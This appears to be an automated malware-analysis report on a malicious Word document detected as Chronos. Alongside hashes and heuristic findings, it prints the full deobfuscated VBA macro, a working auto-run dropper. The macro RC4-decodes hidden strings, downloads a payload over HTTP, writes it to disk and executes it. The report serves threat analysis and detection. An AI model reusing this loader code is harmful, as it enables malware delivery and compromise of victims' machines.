Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cc7908627a0d654e…

MALICIOUS

Office (OOXML)

31.9 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-10-13
MD5: bd2c3c4246b5fc7aab1e967ecd1924c0 SHA-1: 35c8add7a58b252864519a457d068fd744624bc2 SHA-256: cc7908627a0d654eb6b68dfb549a90aba6447ae0c90e8dab8d683dff4a725278
398 Risk Score

Heuristics 11

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    CreateObject "OnN7SrmN5B", "Thja4Xdpz"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject "OnN7SrmN5B", "Thja4Xdpz"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject 27, 94
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName YVuIGE5x00oL, 31, VbMethod, 81, 4, 91
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    P93OyNwH6uHS3 = Environ(KiMeAwOeF9BXUBSqV(Chr(71) + Chr(147) + Chr(4) + Chr(224) + Chr(57) + Chr(184) + Chr(111), "C8Wcn8")) & "\" & OP0oHCgetQU & KiMeAwOeF9BXUBSqV(Chr(154) + Chr(180) + Chr(103) + Chr(165), "A02P9n9cb")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12760 bytes
SHA-256: 9e11b0541d823bd9593fe8e5bec4c03b97a59f19d5430929c22dc264ea87151c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub TLtrynGpFu3DBL()
Dim QTOiAMnMy As Long, CCYRNcWeSRS As Long
QTOiAMnMy = 70
CCYRNcWeSRS = 63
If QTOiAMnMy + CCYRNcWeSRS > 2 Then
CCYRNcWeSRS = QTOiAMnMy + 85
Else
InputBox 19
End If
Resume
DoEvents
FreeFile 62
Loc 61
IsError 92
SP9cKJrqM = UCase(5)
TimeValue 88
DatePart "IU2Rn2aVQuJ", 37
Month 66
CreateObject "OnN7SrmN5B", "Thja4Xdpz"
Beep
GetAllSettings 51, 21
Rnd
Du9Q = CStr(86)
If Abs(90) = 30 Then IQ1Tof13KF = 8593
Choose 21, ObenyFyOCYRN
If IsNumeric(14) = True Then QZGNP55Ei = 80
If CCur(7) = True Then F6pwfUGhZtoJCp = 5556
If CDec(8) = True Then RvqK7GemqX = 25
Partition 49, 3, 41, 1
ChDir 47
OMfD9CC1U = CurDir
MftuoRu3au62qz = Cos(10)
Reset
Sqr 81
CallByName YVuIGE5x00oL, 31, VbMethod, 81, 4, 91
GetObject 27, 94
Join CwR, 38
KzCFxrxPLJ5u = QBColor(7)
YugE06OXU = Day(28)
Dim Ulc00NSbFVoX As Long, SBLQfmQXcIxSLqPq32fia9 As Long
Ulc00NSbFVoX = 65
SBLQfmQXcIxSLqPq32fia9 = 53
If Ulc00NSbFVoX + SBLQfmQXcIxSLqPq32fia9 > 2 Then
SBLQfmQXcIxSLqPq32fia9 = Ulc00NSbFVoX + 88
Else
InputBox 82
End If
End Sub
Function OP0oHCgetQU() As String
Dim Q3yqnvMy As Long, LLKggfA0GLsu4FS As Long
Q3yqnvMy = 7
LLKggfA0GLsu4FS = 56
If Q3yqnvMy + LLKggfA0GLsu4FS > 2 Then
LLKggfA0GLsu4FS = Q3yqnvMy + 7
Else
InputBox 29
End If
Dim C0bd9i() As Byte, PhGsRG12() As Byte, XxMY2lFF As Long, SxSE0Zdrn4xb As Long, QAhhbn0d As String, OatRVXWKmCbrHIc0 As String, U9V0c3ob As Long
Dim OyGguMZ2NeDl As Long, Iau2s As Long
OyGguMZ2NeDl = 90
Iau2s = 39
If OyGguMZ2NeDl + Iau2s > 2 Then
Iau2s = OyGguMZ2NeDl + 94
Else
InputBox 54
End If
U9V0c3ob = 0
Dim RIfBg9FlrUaJGRSk As Long, YK3bG4DGCnyM As Long
RIfBg9FlrUaJGRSk = 43
YK3bG4DGCnyM = 81
If RIfBg9FlrUaJGRSk + YK3bG4DGCnyM > 2 Then
YK3bG4DGCnyM = RIfBg9FlrUaJGRSk + 92
Else
InputBox 8
End If
QsrqM:
Dim Bk7meuIYiV1DnI2M9 As Long, NmXNQkl9J7YXtPr As Long
Bk7meuIYiV1DnI2M9 = 27
NmXNQkl9J7YXtPr = 30
If Bk7meuIYiV1DnI2M9 + NmXNQkl9J7YXtPr > 2 Then
NmXNQkl9J7YXtPr = Bk7meuIYiV1DnI2M9 + 48
Else
InputBox 93
End If
Randomize
OatRVXWKmCbrHIc0 = Int(30 * Rnd)
If OatRVXWKmCbrHIc0 < 4 Then GoTo QsrqM
U9V0c3ob = OatRVXWKmCbrHIc0
If U9V0c3ob > 0& Then
Dim A6wrCXRCK3bG4DGCn As Long, Esb0IJAsBknfULm As Long
A6wrCXRCK3bG4DGCn = 31
Esb0IJAsBknfULm = 45
If A6wrCXRCK3bG4DGCn + Esb0IJAsBknfULm > 2 Then
Esb0IJAsBknfULm = A6wrCXRCK3bG4DGCn + 4
Else
InputBox 28
End If
QAhhbn0d = KiMeAwOeF9BXUBSqV(Chr(39) + Chr(82) + Chr(118) + Chr(148) + Chr(28) + Chr(87) + Chr(233) + Chr(213) + Chr(250) + Chr(130), "Ay51ukvC7")
Randomize
C0bd9i = QAhhbn0d
XxMY2lFF = Len(QAhhbn0d) - 1&
U9V0c3ob = (U9V0c3ob * 2&) - 1&
ReDim PhGsRG12(U9V0c3ob) As Byte
Dim F0B3pVwr As Long, XDfNuYKy8XOZ As Long
F0B3pVwr = 60
XDfNuYKy8XOZ = 4
If F0B3pVwr + XDfNuYKy8XOZ > 2 Then
XDfNuYKy8XOZ = F0B3pVwr + 72
Else
InputBox 93
End If
For SxSE0Zdrn4xb = 0& To U9V0c3ob Step 2&
PhGsRG12(SxSE0Zdrn4xb) = C0bd9i(CLng(XxMY2lFF * Rnd) * 2&)
Next
Dim FGiV7h As Long, TCnWRLqBP4Z As Long
FGiV7h = 84
TCnWRLqBP4Z = 85
If FGiV7h + TCnWRLqBP4Z > 2 Then
TCnWRLqBP4Z = FGiV7h + 27
Else
InputBox 30
End If
End If
Dim TF6xWjq As Long, SMvw2VG0 As Long
TF6xWjq = 84
SMvw2VG0 = 58
If TF6xWjq + SMvw2VG0 > 2 Then
SMvw2VG0 = TF6xWjq + 11
Else
InputBox 53
End If
OP0oHCgetQU = PhGsRG12
Dim OADmmxNsR2t As Long, Kk9bO8HaZByUiMLlp As Long
OADmmxNsR2t = 5
Kk9bO8HaZByUiMLlp = 61
If OADmmxNsR2t + Kk9bO8HaZByUiMLlp > 2 Then
Kk9bO8HaZByUiMLlp = OADmmxNsR2t + 65
Else
InputBox 28
End If
End Function
Function KiMeAwOeF9BXUBSqV(ByVal MlkY3FJ2iU As String, ByVal FoLJ As String) As String
Dim G6rXPxviX3yWoFS1 As Long, B6xWjqBqLBZqD As Long
G6rXPxviX3yWoFS1 = 70
B6xWjqBqLBZqD = 12
If G6rXPxviX3yWoFS1 + B6xWjqBqLBZqD > 2 Then
B6xWjqBqLBZqD = G6rXPxviX3yWoFS1 + 15
Else
InputBox 33
End If
On Error Resume Next
Dim Nncq31KINd As Long, NXtl8RADm As Long
Nncq31KINd = 31
NXtl8RADm = 6
If Nncq31KINd + NXtl8RADm > 2 Then
NXtl8RADm = Nncq31KINd + 7
Else
InputBox 58
End If
Dim TROPuO(0 To 255) As Integer, Yp7oPGAy3BoQl6C As Long, H6bopnyXFeF As Long, JzDaTRfBR19ImE As Long, YhdbkqQ8S7OAn0G() As Byte, DU8QbmwV2UwM() As Byte, A0HZQM1odCI As Byte
Dim Nsdo2XAu2AKl As Long, Sb8lE As Long
Nsdo2XAu2AKl = 78
Sb8lE = 14
If Nsdo2XAu2AKl + Sb8lE > 2 Then
Sb8lE = Nsdo2XAu2AKl + 9
Else
InputBox 52
End If
YhdbkqQ8S7OAn0G() = StrConv(FoLJ, vbFromUnicode)
Dim WJShNmD5uMLm As Long, JuGMS9dE9M As Long
WJShNmD5uMLm = 27
JuGMS9dE9M = 16
If WJShNmD5uMLm + JuGMS9dE9M > 2 Then
JuGMS9dE9M = WJShNmD5uMLm + 51
Else
InputBox 45
End If
For Yp7oPGAy3BoQl6C = 0 To 255
TROPuO(Yp7oPGAy3BoQl6C) = Yp7oPGAy3BoQl6C
Next Yp7oPGAy3BoQl6C
Yp7oPGAy3BoQl6C = 0
H6bopnyXFeF = 0
JzDaTRfBR19ImE = 0
For Yp7oPGAy3BoQl6C = 0 To 255
H6bopnyXFeF = (H6bopnyXFeF + TROPuO(Yp7oPGAy3BoQl6C) + YhdbkqQ8S7OAn0G(Yp7oPGAy3BoQl6C Mod Len(FoLJ))) Mod 256
A0HZQM1odCI = TROPuO(Yp7oPGAy3BoQl6C)
TROPuO(Yp7oPGAy3BoQl6C) = TROPuO(H6bopnyXFeF)
TROPuO(H6bopnyXFeF) = A0HZQM1odCI
Next Yp7oPGAy3BoQl6C
Yp7oPGAy3BoQl6C = 0
H6bopnyXFeF = 0
JzDaTRfBR19ImE = 0
DU8QbmwV2UwM() = StrConv(MlkY3FJ2iU, vbFromUnicode)
For Yp7oPGAy3BoQl6C = 0 To Len(MlkY3FJ2iU)
H6bopnyXFeF = (H6bopnyXFeF + 1) Mod 256
JzDaTRfBR19ImE = (JzDaTRfBR19ImE + TROPuO(H6bopnyXFeF)) Mod 256
A0HZQM1odCI = TROPuO(H6bopnyXFeF)
TROPuO(H6bopnyXFeF) = TROPuO(JzDaTRfBR19ImE)
TROPuO(JzDaTRfBR19ImE) = A0HZQM1odCI
DU8QbmwV2UwM(Yp7oPGAy3BoQl6C) = DU8QbmwV2UwM(Yp7oPGAy3BoQl6C) Xor (TROPuO((TROPuO(H6bopnyXFeF) + TROPuO(JzDaTRfBR19ImE)) Mod 256))
Next Yp7oPGAy3BoQl6C
Dim RJYgc As Long, PTeRvECFE As Long
RJYgc = 57
PTeRvECFE = 26
If RJYgc + PTeRvECFE > 2 Then
PTeRvECFE = RJYgc + 46
Else
InputBox 58
End If
KiMeAwOeF9BXUBSqV = StrConv(DU8QbmwV2UwM, vbUnicode)
Dim Npc1gXEG2Sj As Long, Ly4472anEb6cG As Long
Npc1gXEG2Sj = 9
Ly4472anEb6cG = 24
If Npc1gXEG2Sj + Ly4472anEb6cG > 2 Then
Ly4472anEb6cG = Npc1gXEG2Sj + 4
Else
InputBox 65
End If
End Function
Sub Document_Open()
Dim MRQQ As Long, BGKvvafEEdx As Long
MRQQ = 17
BGKvvafEEdx = 37
If MRQQ + BGKvvafEEdx > 2 Then
BGKvvafEEdx = MRQQ + 4
Else
InputBox 3
End If
Dim EgiwXQP4Ii2S As Long, N3QsZbrHIc0 As Long, OVsTW0MeZvCEiw As Long
Dim Qt5GLQf0Ufus As Long, OHi7eoDq5 As Long
Qt5GLQf0Ufus = 66
OHi7eoDq5 = 15
If Qt5GLQf0Ufus + OHi7eoDq5 > 2 Then
OHi7eoDq5 = Qt5GLQf0Ufus + 15
Else
InputBox 67
End If
EgiwXQP4Ii2S = 954796977: N3QsZbrHIc0 = 0: OVsTW0MeZvCEiw = 0
Dim Hox6FKx6aV1 As Long, JJ1ICSFE2UQrK As Long
Hox6FKx6aV1 = 27
JJ1ICSFE2UQrK = 5
If Hox6FKx6aV1 + JJ1ICSFE2UQrK > 2 Then
JJ1ICSFE2UQrK = Hox6FKx6aV1 + 87
Else
InputBox 23
End If
For N3QsZbrHIc0 = 1 To EgiwXQP4Ii2S
OVsTW0MeZvCEiw = OVsTW0MeZvCEiw + 1
Next N3QsZbrHIc0
Dim RykxxQLmQ As Long, GcOnclkrk7 As Long
RykxxQLmQ = 6
GcOnclkrk7 = 44
If RykxxQLmQ + GcOnclkrk7 > 2 Then
GcOnclkrk7 = RykxxQLmQ + 81
Else
InputBox 70
End If
If OVsTW0MeZvCEiw = EgiwXQP4Ii2S Then
Dim JhNbOmGQqqGD As Long, NT2jUtKoot5 As Long
JhNbOmGQqqGD = 26
NT2jUtKoot5 = 49
If JhNbOmGQqqGD + NT2jUtKoot5 > 2 Then
NT2jUtKoot5 = JhNbOmGQqqGD + 26
Else
InputBox 21
End If
Rvbuxp7lg5JX
Dim GSC3Ec5TrKwMBvrb As Long, CBxTAE As Long
GSC3Ec5TrKwMBvrb = 71
CBxTAE = 11
If GSC3Ec5TrKwMBvrb + CBxTAE > 2 Then
CBxTAE = GSC3Ec5TrKwMBvrb + 66
Else
InputBox 74
End If
Else
Dim RZ1XGVzj8IKW As Long, FKoot5hVkvu As Long
RZ1XGVzj8IKW = 82
FKoot5hVkvu = 51
If RZ1XGVzj8IKW + FKoot5hVkvu > 2 Then
FKoot5hVkvu = RZ1XGVzj8IKW + 72
Else
InputBox 83
End If
TLtrynGpFu3DBL
Dim SLxTAE As Long, JgXu8pMmf7LnN1a8mGQqqGDQy As Long
SLxTAE = 54
JgXu8pMmf7LnN1a8mGQqqGDQy = 62
If SLxTAE + JgXu8pMmf7LnN1a8mGQqqGDQy > 2 Then
JgXu8pMmf7LnN1a8mGQqqGDQy = SLxTAE + 12
Else
InputBox 62
End If
End If
Dim H6hqVWf3C As Long, C6TxzrwMQNIg As Long
H6hqVWf3C = 67
C6TxzrwMQNIg = 96
If H6hqVWf3C + C6TxzrwMQNIg > 2 Then
C6TxzrwMQNIg = H6hqVWf3C + 37
Else
InputBox 14
End If
End Sub
Sub Rvbuxp7lg5JX()
Dim C2exYsYCUO As Long, IG7yzQlwqIBf3 As Long
C2exYsYCUO = 30
IG7yzQlwqIBf3 = 70
If C2exYsYCUO + IG7yzQlwqIBf3 > 2 Then
IG7yzQlwqIBf3 = C2exYsYCUO + 51
Else
InputBox 34
End If
Dim P93OyNwH6uHS3 As String, YKO As Object, X7Yz5azVNyIuGq As Integer
Dim YG0pG8elK0IWOYL8XTPfVo As Long, Hgx2XZkVefbHXm7Mf As Long
YG0pG8elK0IWOYL8XTPfVo = 55
Hgx2XZkVefbHXm7Mf = 68
If YG0pG8elK0IWOYL8XTPfVo + Hgx2XZkVefbHXm7Mf > 2 Then
Hgx2XZkVefbHXm7Mf = YG0pG8elK0IWOYL8XTPfVo + 82
Else
InputBox 41
End If
P93OyNwH6uHS3 = Environ(KiMeAwOeF9BXUBSqV(Chr(71) + Chr(147) + Chr(4) + Chr(224) + Chr(57) + Chr(184) + Chr(111), "C8Wcn8")) & "\" & OP0oHCgetQU & KiMeAwOeF9BXUBSqV(Chr(154) + Chr(180) + Chr(103) + Chr(165), "A02P9n9cb")
Dim AizIiCPw As Long, BZLfLMMcmSLL As Long
AizIiCPw = 53
BZLfLMMcmSLL = 27
If AizIiCPw + BZLfLMMcmSLL > 2 Then
BZLfLMMcmSLL = AizIiCPw + 79
Else
InputBox 23
End If
Set YKO = CreateObject(KiMeAwOeF9BXUBSqV(Chr(8) + Chr(20) + Chr(195) + Chr(44) + Chr(40) + Chr(29) + Chr(115) + Chr(183) + Chr(55) + Chr(74) + Chr(1) + Chr(108) + Chr(13) + Chr(118) + Chr(0) + Chr(147) + Chr(250), "KjSRQNheR"))
Dim KuItQn11uGc0P As Long, NF1zfXBlz3w As Long
KuItQn11uGc0P = 87
NF1zfXBlz3w = 14
If KuItQn11uGc0P + NF1zfXBlz3w > 2 Then
NF1zfXBlz3w = KuItQn11uGc0P + 46
Else
InputBox 97
End If
YKO.Open KiMeAwOeF9BXUBSqV(Chr(236) + Chr(200) + Chr(196), "D4BXf7rDfBKEwI"), KiMeAwOeF9BXUBSqV(Chr(30) + Chr(38) + Chr(203) + Chr(61) + Chr(173) + Chr(146) + Chr(55) + Chr(56) + Chr(106) + Chr(27) + Chr(56) + Chr(182) + Chr(234) + Chr(222) + Chr(208) + Chr(243) + Chr(117) + Chr(176) + Chr(31) + Chr(86) + Chr(152) + Chr(107) + Chr(151) + Chr(54) + Chr(223) + Chr(93) + Chr(150), "HW5PIWxF"), False
Dim GQEk3i As Long, RZEWoZr49iaawBD As Long
GQEk3i = 65
RZEWoZr49iaawBD = 91
If GQEk3i + RZEWoZr49iaawBD > 2 Then
RZEWoZr49iaawBD = GQEk3i + 12
Else
InputBox 52
End If
YKO.setRequestHeader KiMeAwOeF9BXUBSqV(Chr(139) + Chr(170) + Chr(205) + Chr(77) + Chr(145) + Chr(168) + Chr(187) + Chr(53) + Chr(52) + Chr(103), "Ga6NIlLVq3nba5"), KiMeAwOeF9BXUBSqV(Chr(144) + Chr(191) + Chr(111) + Chr(116) + Chr(182) + Chr(116) + Chr(15) + Chr(143) + Chr(116) + Chr(13) + Chr(78), "K61DvPYhxi")
YKO.send
If YKO.readyState = 4 And YKO.Status = 200 Then
Dim JHSi9 As Long, PpBw8Obi7z3 As Long
JHSi9 = 56
PpBw8Obi7z3 = 18
If JHSi9 + PpBw8Obi7z3 > 2 Then
PpBw8Obi7z3 = JHSi9 + 9
Else
InputBox 10
End If
X7Yz5azVNyIuGq = FreeFile
Open P93OyNwH6uHS3 For Binary Access Write Lock Write As #X7Yz5azVNyIuGq
Put #X7Yz5azVNyIuGq, , KiMeAwOeF9BXUBSqV(StrConv(YKO.ResponseBody, vbUnicode), KiMeAwOeF9BXUBSqV(Chr(7) + Chr(157) + Chr(51) + Chr(28) + Chr(16) + Chr(33) + Chr(158) + Chr(190) + Chr(75), "WfJJujKHtaCi"))
Close #X7Yz5azVNyIuGq
Dim PrHPlfZygnJ As Long, YI5I5tivLd3Cw As Long
PrHPlfZygnJ = 63
YI5I5tivLd3Cw = 12
If PrHPlfZygnJ + YI5I5tivLd3Cw > 2 Then
YI5I5tivLd3Cw = PrHPlfZygnJ + 12
Else
InputBox 64
End If
LW8Xprf 1
Dim BQFCtW As Long, P192zzO7bHLb9 As Long
BQFCtW = 14
P192zzO7bHLb9 = 33
If BQFCtW + P192zzO7bHLb9 > 2 Then
P192zzO7bHLb9 = BQFCtW + 1
Else
InputBox 75
End If
CreateObject(KiMeAwOeF9BXUBSqV(Chr(147) + Chr(202) + Chr(209) + Chr(11) + Chr(119) + Chr(188) + Chr(87) + Chr(185) + Chr(136) + Chr(204) + Chr(58) + Chr(215) + Chr(36), "EScAdMTB5NV")).exec """" & P93OyNwH6uHS3 & """"
Dim K1F1IsOowGDXGT As Long, AIrAFD7eH77gXgn As Long
K1F1IsOowGDXGT = 55
AIrAFD7eH77gXgn = 60
If K1F1IsOowGDXGT + AIrAFD7eH77gXgn > 2 Then
AIrAFD7eH77gXgn = K1F1IsOowGDXGT + 45
Else
InputBox 92
End If
End If
Dim VfEy7HDRch8 As Long, YCEdq50JMj As Long
VfEy7HDRch8 = 63
YCEdq50JMj = 56
If VfEy7HDRch8 + YCEdq50JMj > 2 Then
YCEdq50JMj = VfEy7HDRch8 + 78
Else
InputBox 12
End If
Set YKO = Nothing
Dim COKaXc3Kkyre3 As Long, BGcFO5 As Long
COKaXc3Kkyre3 = 36
BGcFO5 = 29
If COKaXc3Kkyre3 + BGcFO5 > 2 Then
BGcFO5 = COKaXc3Kkyre3 + 51
Else
InputBox 83
End If
End Sub
Sub LW8Xprf(QLmiS0kMXabJE1xT As Long)
Dim KQirQu7t5 As Long, M7OLRitAc4 As Long
KQirQu7t5 = 9
M7OLRitAc4 = 36
If KQirQu7t5 + M7OLRitAc4 > 2 Then
M7OLRitAc4 = KQirQu7t5 + 1
Else
InputBox 34
End If
Dim Rt78B As Long
Dim FWnoB2veDWeB2 As Long, JE7q9HU6Vj As Long
FWnoB2veDWeB2 = 94
JE7q9HU6Vj = 5
If FWnoB2veDWeB2 + JE7q9HU6Vj > 2 Then
JE7q9HU6Vj = FWnoB2veDWeB2 + 49
Else
InputBox 62
End If
Rt78B = Timer + QLmiS0kMXabJE1xT
Do While Timer < Rt78B
DoEvents
Loop
Dim H1j4rzH As Long, AtAc4J As Long
H1j4rzH = 37
AtAc4J = 25
If H1j4rzH + AtAc4J > 2 Then
AtAc4J = H1j4rzH + 60
Else
InputBox 55
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 2302b33d9e5c4ee15967853d26b90e30ed257b604a8925455ffa4e5d5fa389a9
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.